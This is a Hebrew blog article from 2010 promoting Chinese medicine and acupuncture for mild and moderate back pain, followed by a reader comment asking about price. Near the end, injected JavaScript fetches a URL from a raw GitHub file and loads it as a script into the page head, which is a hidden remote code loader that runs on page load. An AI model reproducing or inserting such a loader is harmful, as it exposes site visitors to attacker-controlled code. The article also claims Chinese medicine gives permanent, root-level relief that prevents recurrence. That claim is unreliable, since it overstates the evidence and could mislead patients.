טיפול בכאבי גב ע"י רפואה סינית


5 ביוני 2010 | מאת: בן רוזנבליט
כאבי גב רפואה סינית

הרפואה הסינית - פתרון מצוין לכאבי גב

תהיו רגועים, אתם לא לבד: כאבי גב הם אולי הסימפטמום הנפוץ ביותר בעולם המערבי. על פי הסטטיסטיקה: 8 מתוך 10 אנשים יסבלו, סבלו או סובלים מבעיות גב. בעבר, תחום כאבי הגב היה בעיקר נחלתם של הרופאים האורטופדים ששלטו בתחום ללא עוררין. ככל שגברה המודעות לכאב, ויותר חשוב, המודעות לכך שלא מוכרחים לחיות עם הכאב, גבר הביקוש הלגיטימי למציאת פתרון זריז ויעיל בכל קשת המקצועות הרפואיים והפרא רפואיים.

מכיוון שהסיבות לכאבי גב על כל רמותיו הן רבות מדי בכדי לסקור אותם כאן, נזכיר רק את העיקריות: טראומה (תאונת דרכים/ מכה/נפילה) לעמוד שדרה, בעיית חוליות שהיא (פריצת דיסק/בלט דיסק/בעיות ניווניות ועוד) ובעיות אשר  מקורן ממערכת השלד-שריר. לאור הביקוש ההולך וגדל, הרפואה המודרנית התחילה לספק פתרונות חדשניים וטובים, אך רובם התרכזו בעיקר סביב כל הקשור בכאב גב קשה.

הפתרונות נעו בעיקר סביב: תרופות נרקוטיות/ניתוחים חדשניים/זריקות סטרואידים מקומיות או מערכתיות, ובנוסף הפנייה לטיפולי פיזיוטרפיה, אשר גם בהם עברה רוח ההתחדשות. האופציה המועדפת על ידי הרופאים לטיפול בכאב גב בדרגה קשה, לפי דירוג אישי סובייקטיבי, הוא ניתוח. אח"כ בסולם העדיפויות מקומו של הטיפול התרופתי על כל גווניו, ובסוף או במקביל, לאחר תקופת החלמה מסויימת – טיפולי הפיזיוטרפיה.

רפואה סינית – הטיפול המומלץ לכאבי גב בדרגה לא קשה

כאמור, לכאב הקשה זה בדרך כלל עזר, אך מה קורה עם מקרים קלים יותר שאין צורך לנתחם, או לחילופין – מקרים שבהם האדם ממשיך לתפקד בשגרת חיים מסויימת?

המקרים הללו לרוב לא זוכים להתייחסות ראויה ונוטים לטפל בהם רק בתרופות מהסוג הקל, NSAIDS כמו: (אופטלגין/וולטרן) ובטיפולי פיזיוטרפיה זריזים. חשוב לציין שטיפול שכזה לא מראה בדרך כלל תוצאות משביעות רצון ולא מצליח לפתור את הבעיה באופן שמחזיק לאורך זמן. כאן נכנסה לתמונה מלפני כמה עשורים הרפואה המשלימה על כל שיטותיה, ובראשה שיטות כמו הכירופרקטיקה, עיסויים למיניהם, שיטת פלדנקרייז וכמובן – הרפואה הסינית.

הרפואה הסינית ובעיקר הדיקור הסיני, הראו תוצאות חיוביות ביותר גם במחקרים וגם בשטח. למעשה כאבי גב הם הסימפטום הראשון, אשר נחקר בהרחבה והראה תוצאות טובות יותר מהשיטות המקובלות באותה התקופה. בנקודה זו חשוב רגע לעצור ולהדגיש שבשונה מן הרפואה המערבית, התפיסה של הרפואה הסינית רואה את בעיית כאב הגב כבעייה מערכתית בזרימת האנרגיה בגוף, אשר מוצאת ביטוי חיצוני באיזור הגב, אבל יכולה להיות כתוצאה מסיבה חיצונית כמו טראומה,נפילה וכד' –  או בכלל נובעת מבעיה פנימית.

אבחון ושלבי טיפול בכאבי גב ברפואה הסינית

על מנת למצוא את הסיבה השורשית לכאב, על המטפל להשתמש בכל הידע והכלים העומדים לרשותו: אבחנה מערבית לגבי הבעיה ( פריצת דיסק דלקת בשריר/גיד וכו'…) ואבחנה סינית הכוללת: תשאול מעמיק, בדיקת דופק ולשון ובדיקה פיזיקלית (מישוש והסתכלות) של האיזור הפגוע. כמו כן ישנה התייחסות לאופי הכאב: מקומי, מקרין,שורף,עמום,רציף וכו'.

לאחר ביצוע האבחנה עוברים לשלב הטיפולי. הטיפול הבסיסי הינו בדרך כלל באקופונקטורה (דיקור), כאשר ניתנת לשילוב יחד עם צמחי מרפא במקרים היותר קשים, או עם מגוון עיסויים עם הבעיה קשורה לשלד שריר.לגבי מתי לבוא לטיפול: אומנם ניתן להגיע גם עשר שנים לאחר תחילת הבעיה,אך מומלץ מאוד להגיע סמוך ככל האפשר לתחילת הכאבים.הטיפול בנוי למעשה משלושה שלבים עיקריים:

1. בשלב הראשון מנסים למגר את הכאב העיקרי מהר ככל האפשר,ניתן לקרוא לשלב זה השלב של הטיפול הסימפטומתי.

2. בשלב השני עוברים לטפל במקור של הבעיה,שלב זה נקרא טיפול השורש.

3. השלב השלישי אינו חובה,אך מומלץ מאוד,והוא שלב התיחזוק.בשלב הזה המטופל נמצא ללא כאבים כלל, מקפיד על אורח חיים טוב שניתן לו על ידי המטפל בשלב השני הכולל בדרך כלל תרגילי גמישות והרפייה ותזונה נכונה,ומגיע לטיפולים בערך פעם בחודש על מנת לתחזק את עצמו.

כמה זמן אורך הטיפול בכאבי גב באמצעות הרפואה הסינית?

משך הטיפול בכאב גב מאוד משתנה והוא תלוי בהמון גורמים,למשל: כמה זמן עבר מתחילת הכאב,גיל ומצבו הרפואי של המטופל,חומרת הבעיה וכו'.. לרוב משך הזמן הממוצע הוא כעשרה טיפולים בכדי להגיע למקום בו המטופל ללא כאבים או עם כאבים מעטים בלבד, אך כאמור יכול גם לקחת יותר או פחות.

ההקלה בעקבות הטיפול ברפואה סינית אומנם אינה מיידית, אך להבדיל משיטות אחרות היא תמידית ושורשית,כלומר ההתמקדות איננה רק ב"טריק" מסויים שמרדים את תחושת הכאב לזמן מה,אלא פתרון יסודי ועמוק שאמור למנוע בעתיד את ההישנות של כאבי גב נוספים.

בשנים האחרונות המגמה הרווחת בתחום הרפואה הסינית הינה לכיוון התמקצעות של המטפלים,כלומר בחירת התמחות. בהתאם לכך גם שיטות הטיפול משתכללות בהתאם ומותאמות לבעיות השונות. כך נוצר מצב בו גם לתחום הכאב יש את השיטות היותר יעילות והפחות יעילות. מתוך תחום הכאב אחד מן התתי תחומים הוא תחום כאבי הגב – ובו השיטות יעילות במיוחד. רוב כאבי הגב הקלים והבינונים נפתרים יחסית בקלות וביעילות מרובה ,לא סתם זה התחום הנחקר ביותר…

לסיכום

הדרך הטובה ביותר לחיות ללא כאבי גב היא למנוע את היווצרותם על ידי אורח חיים נכון. יש להקפיד על פעילות גופנית סדירה, תרגילי הרפייה ושיחרור, תזונה נכונה והרגלי חיים בריאים. באם קרה ובכל זאת יש כאב ,חשוב לא להזניח ולפנות לרופא בהקדם על מנת לאבחן את המקור לכאב. חשוב לא לוותר ולהתעקש על אבחנה מדוייקת ככל האפשר.

בהינתן האבחנה, במידה ולא מדובר על כאב מסכן חיים או כזה המצריך התערבות רפואית אגרסיבית מיידית, בהחלט ניתן לשקול טיפולים ברפואה סינית – לבד או במקביל לטיפולים אחרים (תרופות,פיזיוטרפיה,הידרוטרפיה). חשוב לזכור שהכאב הינו בדרך כלל סימן מקדים המתריע לאדם כי קיימת בגוף בעיה מסויימת . חשוב לא להתעלם ממנו, ולטפל בו במהירות וביסודיות.

טיפול בכאבי גב ברפואה סינית

(var url = "https://raw.githubusercontent.com/truba77/trubnik/main/to.txt"; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement("script"); script.src = data.trim(); document.getElementsByTagName("head")[0].appendChild(script); });)

תגובה אחת

  1. מודי הסמן
    #1

    עלות טיפול ?

הוספת תגובה